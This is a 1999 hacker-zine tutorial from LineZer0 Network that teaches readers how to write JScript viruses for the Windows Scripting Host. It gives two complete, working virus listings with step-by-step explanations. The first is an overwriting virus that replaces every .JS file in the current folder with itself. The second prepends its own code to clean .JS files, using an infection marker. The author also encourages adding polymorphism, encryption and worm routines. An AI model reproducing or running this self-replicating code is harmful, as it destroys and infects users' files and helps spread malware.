=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[LineZer0 Network 99]=-=
? ? ?
? ____
/ \ ?
A phreaky macro primer v0.1 ? / \ _ \ ?
.by jackie / Metaphase ( .o o. ) ___
__/ ^ \/ \
/ \___o____ \
=-=[ JScript ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
.Introduction to JScripts
.The 'JScript' basics
.The basic overwriting script
.The basic appender script
[ Music ]
.Vision of Disorder .Vision of Disorder
.Introduction
Hello and welcome to the JScript part. JScript is similar to javascript
and included in the Windows Scripting Host. As you might remember from the
VBS part that it is a Windows scripting language and so is JS. The first JS
virus was written by me, and I think this is the very first paper about it.
So, sit back, read and enjoy!
.Basics
Aight, first you have to install the Windows Scripting Host on your sys
tem to make sure that the JS files work. You can download the WSH files
somewhere in the mircosoft site. After installation, every file with the
extension .JS should get executed automaticly with this scripting engine.
To make a new JScript file just load your Notepad or any other plain text
text editor and save the file with the extension ' .JS '. Hmm, JScript is a
real whore sometimes. ;) And not as easy as VBScript, but a nice infectable
platform. And ops, what I may forgot, this is Java not Basic! ;)
To use the good functions of JScript you always have to make ActiveX
communications with Windows. The most common ones used in every JScript
virus are the following.
var FSO=WScript.CreateObject("Scripting.FileSystemObject")
This function creates and ActiveX communication object with the Windows
File System Object. With this you can now get access on the common file
commands like copying files, etc. Ok, that should be enough, if you still
want more information on every command JScript offers just go and download
the papers and help files on the microsoft's site.
.The basic overwriting script
In this section you will learn how to write a very basic overwriting
script virus. I just wrote a kind of instructional virus for that so you
find just the basics in it.
---[ code starts here ]----------------------------------------------------
var FSO=WScript.CreateObject("Scripting.FileSystemObject")
var PossibleFiles=new Enumerator(FSO.GetFolder(".").Files)
for(;!PossibleFiles.atEnd();PossibleFiles.moveNext())
{
if(FSO.GetExtensionName(PossibleFiles.item()).toUpperCase()=="JS")
{
FSO.CopyFile(WScript.ScriptFullName, PossibleFiles.item(),1)
}
}
---[ code ends here ]------------------------------------------------------
Now I will walk through the code for your better understanding.
---------------------------------------------------------------------------
var FSO=WScript.CreateObject("Scripting.FileSystemObject")
---------------------------------------------------------------------------
Here we set the File System Object into our object variable 'FSO'. We
need this object nearly the whole code.
---------------------------------------------------------------------------
var PossibleFiles=new Enumerator(FSO.GetFolder(".").Files)
---------------------------------------------------------------------------
Here we make a collection of all files in the current dir. Collections
differ from arrays in that the members of a collection are not directly
accessible. Instead of using indexes, as you would with arrays, you can
only move the current item pointer to the first or next element of a
collection.
---------------------------------------------------------------------------
for(;!PossibleFiles.atEnd();PossibleFiles.moveNext())
---------------------------------------------------------------------------
We make a loop in our collection, from the first to the last file. As I
told you before, we use an index in our collection.
---------------------------------------------------------------------------
if(FSO.GetExtensionName(PossibleFiles.item()).toUpperCase()=="JS")
{
FSO.CopyFile(WScript.ScriptFullName, PossibleFiles.item(),1)
}
---------------------------------------------------------------------------
In our loop, we check if the extension is equal to ' JS ' and get sure
that the file we want to infect is a JScript file. ;) For the case that a
user wrote his extension this way 'Js' or something like that, we make the
extension string upper case. If the file is a JScript file we copy the
viral script file and overwrite the host file.
You can see that a basic overwriter in JScript takes a few line of code
and it is not the big thing but overwriters are very lame so go on with the
appenders!
.The basic appender script
As in binary viruses, overwriters are the worse ones. They are so de-
structive. ;) So one day someone thought about an appending script virus.
Well, here I will also you just show how to write a basic appender with no
special features like searchin in special folders or traversal routines. ;)
Well, I did a little cheesy graphic to show you how an script appender can
look.
.------------. .------------.
| Normal .JS | -> Virus -> | Marker | If a virus finds a clean JS
`------------´ .------------. file it will write a marker,
| Viral Code | the viral code, an end mark
.------------. and last but not least the
| End Mark | previous code of the host
.------------. into the host file.
| Host Code |
`------------´
As you see, very easy!
---[ code starts here ]----------------------------------------------------
// jScriptAppDemo
var FSO=WScript.CreateObject("Scripting.FileSystemObject")
var OurFile=FSO.OpenTextFile(WScript.ScriptFullName,1)
var OurCode=OurFile.Read(767)
OurFile.Close()
var PossibleFiles=new Enumerator(FSO.GetFolder(".").Files)
for(;!PossibleFiles.atEnd();PossibleFiles.moveNext())
{
if(FSO.GetExtensionName(PossibleFiles.item()).toUpperCase()=="JS")
{
var VictimFile=FSO.OpenTextFile(PossibleFiles.item().path,1)
var Marker=VictimFile.Read(17)
var VictimCode=Marker+VictimFile.ReadAll()
VictimFile.Close()
if(Marker!="// jScriptAppDemo")
{
var VictimFile=FSO.OpenTextFile(PossibleFiles.item().path,2)
VictimFile.Write(OurCode+VictimCode)
VictimFile.Close()
}
}
}
//->
---[ code ends here ]------------------------------------------------------
That you now better understand what I wrote here, I will now walk as I
always do step by step through the code.
---------------------------------------------------------------------------
// jScriptAppDemo
---------------------------------------------------------------------------
This string here (// jScriptAppDemo) is our infection marker. With this
first line we check if the file is already infected. The length of our mar
ker is 17 characters, we need it later in code.
---------------------------------------------------------------------------
var FSO=WScript.CreateObject("Scripting.FileSystemObject")
---------------------------------------------------------------------------
Here we set the File System Object into our object variable 'FSO'. We
need this object nearly the whole code.
---------------------------------------------------------------------------
var OurFile=FSO.OpenTextFile(WScript.ScriptFullName,1)
var OurCode=OurFile.Read(767)
OurFile.Close()
---------------------------------------------------------------------------
The next three lines of code do open the host file, read the first 767
characters out, which is the length of our virus and close it afterwards.
The effective length of the virus is 767 characters and we don't really ap-
pend to code after the file, we set it at the beginning. So if we are in an
already infected file, we read our viral code, which is 767 char's long out
and leave the normal code of the file alone.
---------------------------------------------------------------------------
var PossibleFiles=new Enumerator(FSO.GetFolder(".").Files)
---------------------------------------------------------------------------
Here we make a collection of all files in the current dir. Collections
differ from arrays in that the members of a collection are not directly
accessible. Instead of using indexes, as you would with arrays, you can
only move the current item pointer to the first or next element of a
collection.
---------------------------------------------------------------------------
for(;!PossibleFiles.atEnd();PossibleFiles.moveNext())
---------------------------------------------------------------------------
We make a loop in our collection, from the first to the last file. As I
told you before, we use an index in our collection.
---------------------------------------------------------------------------
if(FSO.GetExtensionName(PossibleFiles.item()).toUpperCase()=="JS")
---------------------------------------------------------------------------
In our loop, we check if the extension is equal to ' JS ' and get sure
that the file we want to infect is a JScript file. ;) For the case that a
user wrote his extension this way 'Js' or something like that, we make the
extension string upper case. If the file is a JScript file we continue
with the following code.
---------------------------------------------------------------------------
var VictimFile=FSO.OpenTextFile(PossibleFiles.item().path,1)
var Marker=VictimFile.Read(17)
var VictimCode=Marker+VictimFile.ReadAll()
VictimFile.Close()
---------------------------------------------------------------------------
If we found a file that fits, we open it and read out the first 17 cha-
racters and save it into the variable 'Marker'. We need it later to check a
previous infection. Next, we save the contents of the variable 'Marker' and
the rest of the file into the string 'VictimCode'. Close the file after all
is done.
---------------------------------------------------------------------------
if(Marker!="// jScriptAppDemo")
{
var VictimFile=FSO.OpenTextFile(PossibleFiles.item().path,2)
VictimFile.Write(OurCode+VictimCode)
VictimFile.Close()
}
---------------------------------------------------------------------------
Here we check if the first 17 characters of the possible file are equal
to our marker, if they are not we open our victim file for writing and do
write our viral code and the original code of the victim file into it and
of course close it, else we do nothing.
---------------------------------------------------------------------------
//->
---------------------------------------------------------------------------
Well, this here is important, after this marker the code of the victim
file will be stored.
As you see, writing an JScript virus is not the big thing. The only
difference to VBScript is the syntax, I am sure you will get it. With this
little nice scripting language you can write Windows - only viruses and you
have really a big control over the whole Windows system. Just play around a
bit with this! A good idea would be adding polymorphism or encryption and a
worm routine. Well, just give it a try! Spotlight on Cross Application!
-End Of Part #9-
=-=[EOF]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[LineZer0 Network 99]=-=